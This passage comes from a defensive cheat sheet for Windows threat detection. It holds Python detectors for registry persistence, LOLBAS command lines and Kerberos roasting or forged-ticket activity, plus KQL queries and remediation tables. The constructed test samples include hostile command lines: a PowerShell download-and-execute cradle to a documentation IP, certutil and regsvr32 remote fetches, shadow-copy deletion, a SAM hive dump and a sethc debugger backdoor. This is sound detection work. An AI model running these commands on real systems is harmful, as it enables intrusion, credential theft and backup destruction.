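    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name = "(Default)" if m.group(1) is None else _unescape(m.group(1))
            data = m.group(2)
            if data.startswith('"') and data.endswith('"'):
                data = _unescape(data[1:-1])
            keys[current][name] = data
    return keys


def find_persistence(keys):
    """Return (finding_type, detail) tuples for the keys this section lists."""
    findings = []
    for path, values in keys.items():
        lp = path.lower()
        if lp == WINLOGON.lower():
            for name, default in WINLOGON_DEFAULTS.items():
                actual = values.get(name)
                if actual is not None and actual.lower() != default.lower():
                    findings.append(("winlogon_hijack", f"{name}={actual}"))
        elif lp.startswith(IFEO.lower() + "\\") and "Debugger" in values:
            target = path.rsplit("\\", 1)[-1]
            findings.append(("ifeo_debugger", f"{target} -> {values['Debugger']}"))
        elif RUN_KEY_RE.search(path):
            for name, cmd in values.items():
                if USER_WRITABLE_RE.search(cmd):
                    findings.append(("run_key_user_writable", f"{name}={cmd}"))
    return findings


# Constructed export: default Userinit, a Shell value with an extra binary
# appended, one Run entry under AppData, and a sethc.exe debugger.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,"
"Shell"="explorer.exe,C:\\Users\\Public\\svc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Updater"="C:\\Users\\bob\\AppData\\Roaming\\upd.exe -s"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"
"""

if __name__ == "__main__":
    for kind, detail in find_persistence(parse_reg_export(SAMPLE_REG)):
        print(kind, detail)
```

The same parser works on exports taken from a suspect host and from a known-good build; diffing the two parsed dictionaries is a quick way to surface entries the pattern rules do not cover.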
4. LOLBAS Quick Reference — Top 20 Living-Off-the-Land Binaries
| Binary | Legitimate Use | Attacker Use | Detection Tip |
|---|---|---|---|
| certutil.exe | Certificate management | Download files; base64 decode | Flag -urlcache, -decode args |
| powershell.exe | Administration scripting | Download/exec; obfuscation; bypass | Flag -enc, -nop, -w hidden, IEX, DownloadString |
| mshta.exe | Run HTA applications | Execute inline VBScript/JScript | Alert on mshta.exe with URL arg or spawning unusual children |
| regsvr32.exe | Register COM DLLs | Execute DLL/SCT without disk write (Squiblydoo) | Alert on /s /n /u /i:http args; unusual parents |
| rundll32.exe | Load DLL exports | Execute malicious DLL functions | Alert on args pointing to Temp/AppData paths |
| wscript.exe / cscript.exe | Windows Script Host | Execute JS/VBS malware | Alert on scripts in Temp/Downloads; unusual parent |
| msiexec.exe | Install MSI packages | Remote MSI payload delivery | Flag /q + URL arguments |
| bitsadmin.exe | Background transfer service | Download files; persist via BITS jobs | Flag /transfer + URL args; check active BITS jobs |
| schtasks.exe | Manage scheduled tasks | Create persistent execution | Flag /create + /tr pointing to scripts |
| at.exe | Legacy task scheduler | Same as schtasks | Deprecated since Windows 8 (prints a deprecation notice instead of scheduling); any invocation on a modern host is notable |
| wmic.exe | WMI administration | Lateral movement; process execution; persistence via event subscriptions | Alert on process call create and /node: for remote exec; deprecated since Windows 10 21H1 and not installed by default on current Windows 11, so any use is worth a look |
| net.exe / net1.exe | Network/user management | Recon; account creation; share access | Alert on net user /add, net group "Domain Admins" /add |
| nltest.exe | Domain trust queries | Domain recon; DC enumeration | Alert on /domain_trusts, /dclist: in non-admin context |
| whoami.exe | Show current user | Post-exploitation recon | Alert when spawned by remote access processes |
| ipconfig.exe / arp.exe | Network configuration | Network discovery | Suspicious when executed by non-user processes |
| reg.exe | Registry management | Read SAM/SECURITY; persistence | Flag save HKLM\SAM and save HKLM\SECURITY |
| vssadmin.exe | Volume shadow management | Delete backups (ransomware) | Critical — alert on delete shadows |
| wevtutil.exe | Event log management | Clear event logs (T1070.001) | Alert on cl (clear-log) subcommand |
| odbcconf.exe | ODBC configuration | DLL execution via response file | Alert on /f or /a REGSVR arguments |
| forfiles.exe | Batch file operations | Command execution; defense evasion | Alert when spawned by scripts with /c flag |
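The Detection Tip column as rules that run over process-creation records (Security 4688 CommandLine or Sysmon S1). This is an added example for this sheet, not a vendor rule set; each rule is a regex matched case-insensitively against the command line, and PowerShell -EncodedCommand payloads are decoded first so the rules also see what the base64 hid. SAMPLE_CMDLINES are constructed.

```python
"""Command-line rules for the LOLBAS rows above.

Added example for this sheet, not a vendor rule set. Apply match_lolbas() to
the CommandLine of 4688 / Sysmon 1 records. SAMPLE_CMDLINES are constructed.
"""
import base64
import re

RULES = [
    ("certutil_download", r"\bcertutil(\.exe)?\b.*-urlcache\b"),
    ("certutil_decode", r"\bcertutil(\.exe)?\b.*-decode\b"),
    ("regsvr32_squiblydoo", r"\bregsvr32(\.exe)?\b.*/i:https?://"),
    ("mshta_remote", r"\bmshta(\.exe)?\b.*https?://"),
    ("powershell_encoded", r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b"),
    ("powershell_download_cradle",
     r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|iex|invoke-expression)\b"),
    ("msiexec_remote", r"\bmsiexec(\.exe)?\b.*(/q|/quiet).*https?://"),
    ("bitsadmin_transfer", r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://"),
    ("schtasks_script", r"\bschtasks(\.exe)?\b.*/create\b.*/tr\b.*\.(ps1|vbs|js|bat|hta)\b"),
    ("wmic_process_create", r"\bwmic(\.exe)?\b.*process\s+call\s+create"),
    ("net_user_add", r"\bnet1?(\.exe)?\b\s+(user|localgroup|group)\b.*/add\b"),
    ("reg_save_sam", r"\breg(\.exe)?\b\s+save\b.*hklm\\(sam|security|system)\b"),
    ("vssadmin_delete_shadows", r"\bvssadmin(\.exe)?\b.*delete\s+shadows"),
    ("wevtutil_clear_log", r"\bwevtutil(\.exe)?\b\s+(cl|clear-log)\b"),
    ("rundll32_user_path", r"\brundll32(\.exe)?\b.*\\(temp|appdata|users\\public)\\"),
    ("odbcconf_regsvr", r"\bodbcconf(\.exe)?\b.*(/a\s*\{?regsvr|/f\b)"),
    ("forfiles_exec", r"\bforfiles(\.exe)?\b.*/c\b"),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in RULES]
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE) as text, or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def match_lolbas(cmdline):
    """Names of rules matching the command line and, if present, its decoded payload.
    The payload goes on its own line so a binary-name anchor does not leak into it."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else f"{cmdline}\n{decoded}"
    return [name for name, rx in COMPILED if rx.search(haystack)]


# Constructed samples; 198.51.100.7 is a documentation-range address.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINES = [
    r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt",
    r"regsvr32 /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll",
    f"powershell.exe -nop -w hidden -enc {_ENCODED}",
    r"vssadmin.exe delete shadows /all /quiet",
    r'"C:\Windows\System32\svchost.exe" -k netsvcs -p',
    r"reg.exe save hklm\sam C:\Temp\sam.hiv",
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(match_lolbas(cmd) or "-", "<=", cmd[:70])
```

Rules keyed on the binary name miss renamed copies; pair them with Sysmon S1 OriginalFileName or 4688 with full paths, and expect to add parent-process conditions (Office spawning these binaries) before the list is quiet enough for alerting.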
5. Active Directory Attack Quick Reference
Kerberoasting (T1558.003)
| Field | Detail |
|---|---|
| What | Request TGS tickets for SPN-registered accounts; crack offline |
| Prerequisite | Any domain user account; SPN-registered service accounts with weak passwords |
| Detection Events | EID 4769 — TicketEncryptionType = 0x17 (RC4-HMAC) for a ServiceName that is not a machine account ($) or krbtgt; many distinct ServiceNames from one IpAddress within minutes. Tools can also request AES tickets, so volume per client matters even when 0x17 is absent |
| KQL | SecurityEvent \| where EventID==4769 and TicketEncryptionType=="0x17" and ServiceName !endswith "$" and ServiceName != "krbtgt" \| summarize spns=dcount(ServiceName) by IpAddress, bin(TimeGenerated, 10m) \| where spns > 5 |
| Remediation | AES-only (msDS-SupportedEncryptionTypes) for service accounts; MSAs/gMSAs; long random passwords (25+); remove SPNs that are no longer needed; a honeypot SPN account that should never be requested |
AS-REP Roasting (T1558.004)
| Field | Detail |
|---|---|
| What | Request AS-REP for accounts with pre-auth disabled; crack offline |
| Prerequisite | Account with "Do not require Kerberos preauthentication" set |
| Detection Events | EID 4768 — PreAuthType = 0 (usually with TicketEncryptionType 0x17, since the tool asks for RC4) |
| KQL | SecurityEvent \| where EventID==4768 and PreAuthType=="0" |
| Remediation | Enable pre-auth on all accounts; audit quarterly via Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} |
DCSync (T1003.006)
| Field | Detail |
|---|---|
| What | Simulate DC replication (DRSUAPI GetNCChanges) to pull password hashes |
| Prerequisite | Replication rights on the domain object (Domain Admins, Enterprise Admins, DC computer accounts, or custom delegation) |
| Detection Events | EID 4662 on the DC — Properties contains DS-Replication-Get-Changes-All ({1131f6ad...}) with AccessMask 0x100 (control access) and a SubjectUserName that is not a DC computer account. Requires the Directory Service Access subcategory and a SACL on the domain object covering the replication rights. 4662 has no client IP: correlate on SubjectLogonId with the matching 4624 to get IpAddress |
| Remediation | Audit who holds replication rights on the domain object; alert on any replication access by a non-DC principal; watch for new delegations of these rights, which are a common backdoor |
Golden Ticket (T1558.001)
| Field | Detail |
|---|---|
| What | Forge a TGT using the KRBTGT hash; any user, any group membership, any lifetime |
| Prerequisite | KRBTGT account hash (via DCSync or DC compromise) |
| Detection Events | No DC-side 4768 for the account/client before its 4769s (a forged TGT skips the AS exchange); 4769/4624 for accounts that do not exist or are disabled; 4624/4672 where TargetDomainName is the FQDN or lowercase instead of the NetBIOS name (a Mimikatz default); ticket lifetimes beyond domain policy when inspected with klist on the host |
| Remediation | Reset the KRBTGT password twice, waiting at least the maximum TGT lifetime (10 h by default) plus full replication between resets, so tickets forged with the old key stop validating; then rotate every other credential exposed by the compromise |
Silver Ticket (T1558.002)
| Field | Detail |
|---|---|
| What | Forge TGS for specific service using service account hash; bypasses KDC |
| Prerequisite | Service account NTLM hash |
| Detection Events | EID 4624 with no preceding 4768/4769 on DC; unusual service access patterns |
| Remediation | Protect service account passwords; enable PAC validation |
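The Kerberos rows of section 1 and the four ticket attacks above share one data source, the DCs' 4768/4769 events, so one detector covers them: Kerberoasting as many RC4 service tickets per client, AS-REP Roasting as 4768 with PreAuthType 0, and forged tickets as a TGS request with no prior TGT request from that client (the Silver Ticket case never reaches a DC, which the docstring spells out). This is an added example for this sheet, not tooling from the page; SAMPLE_EVENTS is constructed, and real input must be the merged Security logs of every DC, since a client's AS-REQ and TGS-REQ can land on different DCs.

```python
"""Kerberos ticket-request triage over exported 4768/4769 records.

Added example for the Kerberos table in section 1 and for the Kerberoasting,
AS-REP Roasting, Golden Ticket and Silver Ticket entries; not from the page.
Records are dicts with Security-log field names (EventID, TimeCreated,
TargetUserName, ServiceName, IpAddress, TicketEncryptionType, PreAuthType,
Status). Merge all DCs' logs first. SAMPLE_EVENTS is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"
ROAST_WINDOW = timedelta(minutes=10)
ROAST_MIN_SPNS = 5
TGT_LIFETIME = timedelta(hours=10)       # default maximum TGT lifetime


def _ts(e):
    return datetime.fromisoformat(e["TimeCreated"])


def _account(name):
    """4769 carries user@REALM, 4768 carries the bare sAMAccountName."""
    return name.lower().split("@", 1)[0]


def _is_roastable(service_name):
    """Machine accounts ($) have random passwords and krbtgt appears on TGT
    renewals; neither is a Kerberoasting target."""
    n = _account(service_name)
    return not n.endswith("$") and n != "krbtgt"


def kerberoasting(events, window=ROAST_WINDOW, min_spns=ROAST_MIN_SPNS):
    """Clients requesting RC4 service tickets for many distinct accounts inside
    `window`. Returns {IpAddress: sorted ServiceNames of the densest window}."""
    per_ip = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4769 and e.get("TicketEncryptionType", "").lower() == RC4_HMAC
                and _is_roastable(e["ServiceName"])):
            per_ip[e["IpAddress"]].append((_ts(e), e["ServiceName"]))
    hits = {}
    for ip, items in per_ip.items():
        items.sort()
        best, lo = set(), 0
        for hi in range(len(items)):
            while items[hi][0] - items[lo][0] > window:
                lo += 1
            spns = {s for _, s in items[lo:hi + 1]}
            if len(spns) > len(best):
                best = spns
        if len(best) >= min_spns:
            hits[ip] = sorted(best)
    return hits


def asrep_roasting(events):
    """4768 with PreAuthType 0: the KDC issued an AS-REP without pre-auth."""
    return sorted({(e["IpAddress"], e["TargetUserName"]) for e in events
                   if e["EventID"] == 4768 and str(e.get("PreAuthType")) == "0"})


def tgs_without_tgt(events, lifetime=TGT_LIFETIME):
    """4769s for an (IpAddress, account) pair with no successful 4768 from that
    client in the preceding `lifetime`. A forged TGT (Golden Ticket) skips the
    AS exchange, so the TGS-REQ is the first thing any DC sees. Silver Tickets
    never reach a DC; for those, look for 4624 on the service host with no
    DC-side 4769 for that user."""
    tgts = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e.get("Status", "0x0") == "0x0":
            tgts[(e["IpAddress"], _account(e["TargetUserName"]))].append(_ts(e))
    orphans = []
    for e in events:
        if e["EventID"] != 4769:
            continue
        t, key = _ts(e), (e["IpAddress"], _account(e["TargetUserName"]))
        if not any(timedelta(0) <= t - tt <= lifetime for tt in tgts[key]):
            orphans.append((e["IpAddress"], e["TargetUserName"], e["ServiceName"]))
    return orphans


def _ev(eid, ts, user, ip, **extra):
    rec = {"EventID": eid, "TimeCreated": ts, "TargetUserName": user, "IpAddress": ip,
           "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "PreAuthType": "2",
           "Status": "0x0"}
    rec.update(extra)
    return rec


# Constructed sample: a normal user, a roasting run from 10.0.0.5 (machine and
# krbtgt tickets mixed in), one AS-REP without pre-auth, and a TGS request for
# Administrator from 10.0.0.66 that no DC ever saw a TGT request for.
_ROAST = ["svc_sql", "svc_web", "svc_backup", "svc_sccm", "svc_ftp", "svc_print", "WS02$", "krbtgt"]
SAMPLE_EVENTS = [
    _ev(4768, "2024-03-01T08:00:00", "jsmith", "10.0.0.8"),
    _ev(4769, "2024-03-01T08:05:00", "jsmith@CORP.LOCAL", "10.0.0.8", ServiceName="FS01$"),
    _ev(4768, "2024-03-01T08:55:00", "bob", "10.0.0.5"),
    *[_ev(4769, f"2024-03-01T09:00:{i:02d}", "bob@CORP.LOCAL", "10.0.0.5",
          ServiceName=spn, TicketEncryptionType="0x17") for i, spn in enumerate(_ROAST)],
    _ev(4768, "2024-03-01T09:10:00", "legacy_svc", "10.0.0.5", PreAuthType="0",
        TicketEncryptionType="0x17"),
    _ev(4769, "2024-03-01T10:00:00", "Administrator@CORP.LOCAL", "10.0.0.66", ServiceName="DC01$"),
]

if __name__ == "__main__":
    print("kerberoasting:", kerberoasting(SAMPLE_EVENTS))
    print("as-rep roasting:", asrep_roasting(SAMPLE_EVENTS))
    print("tgs without tgt:", tgs_without_tgt(SAMPLE_EVENTS))
```

The orphan check is only as good as the log coverage: a gap in one DC's export or a TGT issued before the collection window both look like a forged ticket, so confirm against the 4624 TargetDomainName and klist indicators in the Golden Ticket row before escalating.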
Pass-the-Hash (T1550.002)
| Field | Detail |
|---|---|
| What | Use the NTLM hash directly to authenticate without knowing the plaintext password |
| Prerequisite | NTLM hash of an account with rights on the target (local or domain admin for lateral movement), taken from LSASS, the SAM or NTDS.dit |
| Detection Events | EID 4624 Type 3 with LogonProcessName NtLmSsp and AuthenticationPackageName NTLM for interactive accounts, from workstations that normally use Kerberos; 4776 on the DC; admin share access 5140/5145 (requires File Share auditing); 4624 Type 9 on the source host when Mimikatz sekurlsa::pth is used |
| Remediation | Credential Guard; LAPS so local admin hashes are unique per host; disable NTLM where possible; tiered admin model; Protected Users group for privileged accounts |
Pass-the-Ticket (T1550.003)
| Field | Detail |
|---|---|
| What | Inject stolen Kerberos ticket into session |
| Prerequisite | Valid Kerberos TGT or TGS stolen from memory |
| Detection Events | EID 4768/4769 from unusual source IPs; ticket anomalies; Sysmon S10 on LSASS |
| Remediation | Credential Guard; short ticket lifetimes; monitor LSASS access |
Overpass-the-Hash (T1550.002 variant)
| Field | Detail |
|---|---|
| What | Use an NTLM hash (or AES key) to obtain a legitimate Kerberos TGT, so a stolen hash can be used against Kerberos-only services |
| Prerequisite | User's NTLM hash or AES key |
| Detection Events | EID 4768 with TicketEncryptionType 0x17 (RC4) for an account or client that normally negotiates AES (an NTLM hash can only produce RC4), or from a host other than the user's usual workstation; 4624 Type 9 (NewCredentials) on the source host followed by 4768/4769 for a different user than the one logged on |
| Remediation | Same as PtH; disable RC4 via msDS-SupportedEncryptionTypes and the "Network security: Configure encryption types allowed for Kerberos" policy; monitor RC4 TGT requests; AES enforcement |